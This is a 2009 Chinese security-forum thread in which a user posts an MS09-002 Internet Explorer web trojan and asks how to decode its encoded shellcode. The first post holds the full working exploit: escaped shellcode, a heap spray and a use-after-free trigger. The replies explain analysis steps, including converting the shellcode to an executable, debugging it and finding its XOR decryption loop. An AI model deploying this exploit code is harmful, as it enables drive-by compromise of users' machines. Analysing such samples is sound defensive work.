请求一个网页木马的加密方式分析 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流请求一个网页木马的加密方式分析

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

[求助] 请求一个网页木马的加密方式分析

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-25 22:21 \| 只看楼主短消息资料字号：小中大 1楼请求一个网页木马的加密方式分析 [复制到剪贴板] CODE: <script language="JavaScript"> var c=unescape("%u6A60%u5830%u8B64%uC108%u04E0%u0C8D%u6801%u526B%u6D34%u3958%u7501%uC301%u0189%u16EB%u335B%u66C9%u1FB8%u665F%u0431%u414B%u6640%uF981%u015B%uF37C%u05EB%uE5E8%uFFFF%uF6FF%u2204%u215F%u4800%u7A6F%uAF3B%uAE5E%u8EC7%u275F%uA35F%u251F%u5AD4%u8643%u44D4%uA657%uAFA8%u2FB3%u305D%uB45F%u4784%uF458%u1019%u6796%u6501%u3E35%uD006%u38BB%u3A5F%uC2BD%uBC1F%uFE67%uC42A%u79D6%u2A6F%u185D%uD6B7%u435E%uA65F%u2FA6%u1F5E%u2837%u4831%u215F%u382A%u2633%uC70B%uA559%u4F59%u4F5F%uB8CA%u50EB%u525F%u6E37%u541F%u3F5F%u3CA0%u69A0%u7484%u097B%u0E0F%u0DA0%uD77F%u359B%u9A4E%u5E97%u6037%uF7C3%u36C9%u9C0F%u7809%u8E17%u995C%u7709%u5835%u0D06%u73D4%uC0D2%u685F%u6D5F%uF5D4%u6FF7%u705F%u8CD4%u9B09%u7389%u745F%u8601%u28FA%u09D4%u907B%u7844%u7A5F%u6135%u7135%u7D35%uBBD4%u7B5C%u46C3%uE958%u2918%u8499%u0F9C%uAD21%u86B7%u875E%uE25F%uE362%uE069%u0078%u8F9A%u115B%u8999%uC837%u56F4%u5258%uECD4%u7B47%u94BA%u955F%uFE37%u9D57%uF05F%u9137%u9A55%uCE37%u70D4%u1635%u025B%uACF4%uF09F%uCB0F%u29A0%u3F5B%u29F5%u96E1%uA65E%uF05F%u5737%uA95F%u555F%uAF09%u6B5C%uAD98%uC23E%u8138%uF098%uD45B%uD727%uE45F%uE2A0%u8657%uE584%uE00C%uFED2%uE96B%u450C%u9709%u7C6C%u41D4%uAC35%u1406%u3DBD%u0639%uE61B%uC263%u4F5E%u48A3%uD618%u900E%u990F%u980E%u9B0E%u9A0E%u5AD2%uCC6C%uCE5F%u9E0D%u86A0%u2E53%uC209%u85D4%u956F%u8704%u375C%u365C%u395C%u385C%u36DC%u815B%u570C%u3F85%u8CA8%u3FA0%uC5B7%u1EA0%u88A0%uBB76%u6969%uC10B%u2B5B%u2571%uE87F%uD935%u5007%uE85F%u93A1%uFFA0%uCE9D%u855F%uA86D%uF1E5%u0C5C%u0C20%u364D%uF57B%u06E7%uF75F%uCE5F%uADD2%uFE7B%uD592%uE89D%u455F%uFF4A%uFF5F%u05B4%u1ED8%u0261%uB960%u0760%u7A9E%u149F%u13A2%u5A60%u6334%u6064%u5C40%u5A9F%u5774%u5FA3%u4AEB%u555C%u4DEB%u6D48%u102D%u9FBD%u1673%u25B5%u5EA9%u9321%u9364%u5EED%u1948%u2F00%u12A9%u0EDE%uC95A%u2814%uE8A1%u2167%u63AA%uD58B%u2A59%u5301%uAC81%u3823%uEC63%u2EEB%u80E8%uEF39%u7B31%u5BEB%uA45C%u1E14%u3218%u6495%u45EB%u3740%u0695%u7FA9%u9A21%uFD63%uE253%u846F%u0170%u48B6%uFC68%u39AB%uE563%uAB20%u7A91%u377F%u1D87%u1AEB%u4644%u20BD%u4BEB%uC32B%u553E%u9763%u4FEB%u4FEB%uE6A5%u173E%uA7A3%uADC0%uAE9F%u2652%u5FF1%uB659%uD61D%u6F19%uCF86%u10BA%u641B%uD519%u3BAC%uF87E%uB204%u1690%u621B%u8AF9%uDCF0%u2CE9%u7CDA%u2991%uB045%uE72D%u7650%uBEE0%uF3CF%u6A60%u6B60%u1808%u1D14%u415A%u5E4F%u4752%u414E%u424E%u424E%u174F%u1901%u5803%u0F05%u7805%uFC60%u7AE0%u0060"); var array = new Array(); var ls = 0x100000-(c.length2+0x01020); var b = unescape("%u0C0C%u0C0C"); while(b.length<ls/2) { b+=b;} var lh = b.substring(0,ls/2); delete b; for(i=0; i<0xC0; i++) { array[i] = lh + c; } CollectGarbage(); var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA"); var a1 = new Array(); for(var x=0;x<1000;x++) a1.push(document.createElement("img")); function ok() { o1=document.createElement("tbody"); o1.click; var o2 = o1.cloneNode(); o1.clearAttributes(); o1=null; CollectGarbage(); for(var x=0;x<a1.length;x++) a1[x].src=s1; o2.click; } </script><script>window.setTimeout("ok();",1000);</script> MS09-002的网页木马，分析了办天，还没有解出来。我去%u替换了，应该是16进度，但是不行呀。。。。。请高人分析解答一下。谢谢用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)*
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	分享到：

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-25 23:18 \| 只看楼主短消息资料字号：小中大 2楼回复：请求一个网页木马的加密方式分析没人。。。帮帮我呀
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

BlastXiang 初生襁褓狮帖子:19 注册: 2009-08-22 来自:	发表于： 2009-11-25 23:25 \| 短消息资料字号：小中大 3楼回复：请求一个网页木马的加密方式分析生成exe调试我这儿到LoadLibraryExA加载urlmon.dll时候会卡住不过内存里面能看到地址127.0.0.1/calc.exe了
BlastXiang 初生襁褓狮帖子:19 注册: 2009-08-22 来自:

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-25 23:51 \| 只看楼主短消息资料字号：小中大 4楼回复：请求一个网页木马的加密方式分析没明白。。。这个是什么加密方式呢？该怎么解？
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

shadowmin 拙长孩提狮帖子:69 注册: 2007-10-27 来自:	发表于： 2009-11-26 07:42 \| 短消息资料字号：小中大 5楼回复：请求一个网页木马的加密方式分析 shellcode 解的时候可能需要密钥，或者你可以用OD调试相当于把上面的shellcode生成EXE文件，然后用OD调试。
shadowmin 拙长孩提狮帖子:69 注册: 2007-10-27 来自:

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-26 11:09 \| 只看楼主短消息资料字号：小中大 6楼回复：请求一个网页木马的加密方式分析汗，等于没说，调试什么啊？
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

linux_feixue 初生襁褓狮帖子:2 注册: 2009-11-26 来自:	发表于： 2009-11-26 13:02 \| 短消息资料字号：小中大 7楼回复：请求一个网页木马的加密方式分析你吧c=unescape("%u6A60。。。里面的内容，转化成16进制，用Malzilla，转存为hexbin 然后将文件加载进IDA，你会看见里面的代码有加密 seg000:00000023 loc_23: ; CODE XREF: sub_1C+12j seg000:00000023 66 31 04 4B xor [ebx+ecx*2], ax seg000:00000027 41 inc ecx seg000:00000028 40 inc eax seg000:00000029 66 81 F9 5B 01 cmp cx, 15Bh seg000:0000002E 7C F3 jl short loc_23 这就是那个加密循环，写个简单的IDC脚本，就可以搞定了，或者像楼上的人说的，将这段代码移植calc.exe 的入口点，用OD加载执行
linux_feixue 初生襁褓狮帖子:2 注册: 2009-11-26 来自:

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-26 13:45 \| 只看楼主短消息资料字号：小中大 8楼回复：请求一个网页木马的加密方式分析也太麻烦了吧，不会操作
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

BlastXiang 初生襁褓狮帖子:19 注册: 2009-08-22 来自:	发表于： 2009-11-26 18:12 \| 短消息资料字号：小中大 9楼回复 8F dby107 的帖子 redoce: 执行：“9>ShellCode至Exe”－复制%u部分到上方代码区，点“去除无效字符”和“%u整理”，再点“生成exe”，生成的东西就能用来调试了
BlastXiang 初生襁褓狮帖子:19 注册: 2009-08-22 来自:

dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:	发表于： 2009-11-26 18:50 \| 只看楼主短消息资料字号：小中大 10楼回复：请求一个网页木马的加密方式分析哦，但我不是要它的木马地址。而是一个完整的代码有没有办法啊？
dby107 初生襁褓狮帖子:12 注册: 2009-11-25 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT